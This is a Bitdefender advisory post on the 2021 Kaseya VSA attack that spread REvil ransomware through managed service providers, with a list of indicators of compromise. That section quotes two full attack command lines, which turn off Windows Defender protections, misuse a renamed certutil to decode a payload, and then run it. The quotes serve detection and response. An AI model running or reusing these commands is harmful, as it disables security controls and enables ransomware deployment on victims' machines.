Update: July 13, 2021 -- Kaseya issued a critical security update for VSA users that is available on their site - Kaseya Critical Security Update. We recommend users follow Kaseya's recommended updates as soon as possible.
- - - - - - - - - - - - - - -
We continue to monitor and analyze the attack using Kaseya Software to deploy a variant of REvil ransomware into a victim’s environment. The attack targeted Kaseya’s managed service provider (MSP) customers, which often provide IT support to small- to medium-size businesses. By targeting MSPs, attackers also seek to access and infiltrate the MSP’s customers computer networks.
Guidance for Bitdefender Customers
We continue to monitor and assess any customer impact, and will develop further guidance as appropriate, including how Bitdefender customers can protect or mitigate impacts to affected systems. Our Labs team findings to date indicate Bitdefender solutions detect and block a command line action and delivered payloads used in the attack, thus, protecting customers from this step in the attack. If you are a Kaseya user and believe that you are impacted, please contact us at: [email protected]
Verified Indicators of Compromise
C:\Windows\system32\cmd.exe” /c ping 127.0.0.1 -n 5825 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe
and
C:\WINDOWS\system32\cmd.exe /c ping 127.0.0.1 -n 3637 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\WaRCoMWorking\agent.crt c:\WaRCoMWorking\agent.exe & del /q /f c:\WaRCoMWorking\agent.crt C:\Windows\cert.exe & c:\WaRCoMWorking\agent.exe
2. Hashes:
tags
Bitdefender is a cybersecurity leader delivering best-in-class threat prevention, detection, and response solutions worldwide. Guardian over millions of consumer, enterprise, and government environments, Bitdefender is one of the industry’s most trusted experts for eliminating threats, protecting privacy, digital identity and data, and enabling cyber resilience. With deep investments in research and development, Bitdefender Labs discovers hundreds of new threats each minute and validates billions of threat queries daily. The company has pioneered breakthrough innovations in antimalware, IoT security, behavioral analytics, and artificial intelligence and its technology is licensed by more than 180 of the world’s most recognized technology brands. Founded in 2001, Bitdefender has customers in 170+ countries with offices around the world.
View all postsDon’t miss out on exclusive content and exciting announcements!